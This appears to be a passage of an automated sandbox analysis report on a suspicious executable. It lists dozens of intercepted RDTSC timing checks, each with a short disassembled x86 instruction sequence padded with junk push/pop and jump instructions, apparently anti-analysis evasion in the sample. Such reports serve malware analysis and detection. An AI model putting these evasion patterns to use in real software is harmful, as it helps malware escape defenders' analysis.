Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B8D8 second address: D0B8DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0B8DC second address: D0B8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCBA141C926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BA6A second address: D0BA6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BA6F second address: D0BA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BD16 second address: D0BD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCBA141FCB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BD31 second address: D0BD36 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BD36 second address: D0BD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BFEE second address: D0BFF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0BFF4 second address: D0BFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0C2A9 second address: D0C2AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0C2AF second address: D0C2B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D0C2B6 second address: D0C2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: C9CCB9 second address: C9CCC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1795E second address: D17962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17962 second address: D17986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FCBA141FCBCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17986 second address: D1799D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1799D second address: D179A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D179A3 second address: D179A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17C5B second address: D17C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17C61 second address: D17C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17C65 second address: D17C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17DC6 second address: D17E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FCBA141C936h 0x0000000b jmp 00007FCBA141C934h 0x00000010 popad 0x00000011 jo 00007FCBA141C961h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D180D3 second address: D180D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D180D9 second address: D180DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D186BA second address: D186CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCBA141FCA6h 0x0000000a jl 00007FCBA141FCAEh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D186CC second address: D186D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1762C second address: D1764D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCAEh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d jg 00007FCBA141FCF0h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1764D second address: D17653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D17653 second address: D1765C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1765C second address: D17674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141C934h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1D72B second address: D1D730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1D730 second address: D1D744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Ah 0x00000007 jo 00007FCBA141C932h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1D744 second address: D1D767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141FCA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FCBA141FCABh 0x00000012 js 00007FCBA141FCA8h 0x00000018 push edx 0x00000019 pop edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8837 second address: CD883D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8DBA second address: CD8DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8DC1 second address: CD8DC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EA0 second address: CD8EA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EA5 second address: CD8EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jbe 00007FCBA141C926h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EB7 second address: CD8EF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e jnc 00007FCBA141FCA8h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FCBA141FCB8h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 pushad 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EF7 second address: CD8EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8EFF second address: CD8F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop eax 0x00000007 sub dword ptr [ebp+122D2456h], esi 0x0000000d push 426B936Eh 0x00000012 ja 00007FCBA141FCB8h 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007FCBA141FCA6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD8F1F second address: CD8F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD90DC second address: CD90E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD90E0 second address: CD90E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD92D4 second address: CD92DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9716 second address: CD971B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD971B second address: CD9729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9729 second address: CD9777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2920h] 0x00000011 mov edi, dword ptr [ebp+122D2AD8h] 0x00000017 push 0000001Eh 0x00000019 mov dword ptr [ebp+122D323Eh], edx 0x0000001f nop 0x00000020 push edi 0x00000021 push ecx 0x00000022 jmp 00007FCBA141C930h 0x00000027 pop ecx 0x00000028 pop edi 0x00000029 push eax 0x0000002a pushad 0x0000002b pushad 0x0000002c je 00007FCBA141C926h 0x00000032 jmp 00007FCBA141C92Ch 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9777 second address: CD977B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD990C second address: CD9910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9B62 second address: CD9BD0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBA141FCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FCBA141FCB2h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FCBA141FCA8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d movsx edx, ax 0x00000030 lea eax, dword ptr [ebp+1247A629h] 0x00000036 mov di, si 0x00000039 nop 0x0000003a jc 00007FCBA141FCAAh 0x00000040 push edi 0x00000041 push esi 0x00000042 pop esi 0x00000043 pop edi 0x00000044 push eax 0x00000045 jbe 00007FCBA141FCC6h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FCBA141FCADh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9BD0 second address: CC0265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+1244AED8h], ecx 0x00000010 call dword ptr [ebp+122D2F13h] 0x00000016 jmp 00007FCBA141C92Dh 0x0000001b pushad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1C987 second address: D1C9B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FCBA141FCA6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FCBA141FCAEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1CAEA second address: D1CAF4 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA141C926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1CC2D second address: D1CC31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1CC31 second address: D1CC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCBA141C926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1CC41 second address: D1CC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1CDAC second address: D1CDB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1CDB2 second address: D1CDD8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FCBA141FCADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FCBA141FCA8h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push edx 0x00000016 jp 00007FCBA141FCAEh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1D331 second address: D1D339 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D1D339 second address: D1D348 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA141FCA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20AEA second address: D20AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20AEF second address: D20AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20AF6 second address: D20AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20AFF second address: D20B03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20B03 second address: D20B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20B09 second address: D20B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a jmp 00007FCBA141FCB3h 0x0000000f pop ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FCBA141FCADh 0x00000018 popad 0x00000019 jo 00007FCBA141FCB3h 0x0000001f jmp 00007FCBA141FCADh 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20C8D second address: D20C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20C93 second address: D20C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20C99 second address: D20CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007FCBA141C939h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D20CC0 second address: D20CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FCBA141FCA8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D233A3 second address: D233C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FCBA141C937h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D2741C second address: D2743A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCB4h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D2743A second address: D2744D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141C926h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D2744D second address: D27453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D27453 second address: D27469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FCBA141C92Fh 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D27469 second address: D27477 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FCBA141FCA6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: CD9559 second address: CD95D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCBA141C928h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FCBA141C932h 0x00000013 jp 00007FCBA141C92Ch 0x00000019 jno 00007FCBA141C926h 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FCBA141C928h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov edi, eax 0x0000003c stc 0x0000003d mov ebx, dword ptr [ebp+1247A668h] 0x00000043 movsx edx, cx 0x00000046 add eax, ebx 0x00000048 push 00000000h 0x0000004a push edx 0x0000004b call 00007FCBA141C928h 0x00000050 pop edx 0x00000051 mov dword ptr [esp+04h], edx 0x00000055 add dword ptr [esp+04h], 0000001Bh 0x0000005d inc edx 0x0000005e push edx 0x0000005f ret 0x00000060 pop edx 0x00000061 ret 0x00000062 and dl, FFFFFF87h 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 pushad 0x0000006a popad 0x0000006b jns 00007FCBA141C926h 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D2C03E second address: D2C046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D30A80 second address: D30A85 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D2FDFE second address: D2FE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCBA141FCACh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D30215 second address: D3021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D30395 second address: D3039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D30530 second address: D30536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D30536 second address: D3053C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D36D67 second address: D36D6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D36D6B second address: D36D6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: D36D6F second address: D36D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FCBA141C926h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 rdtsc
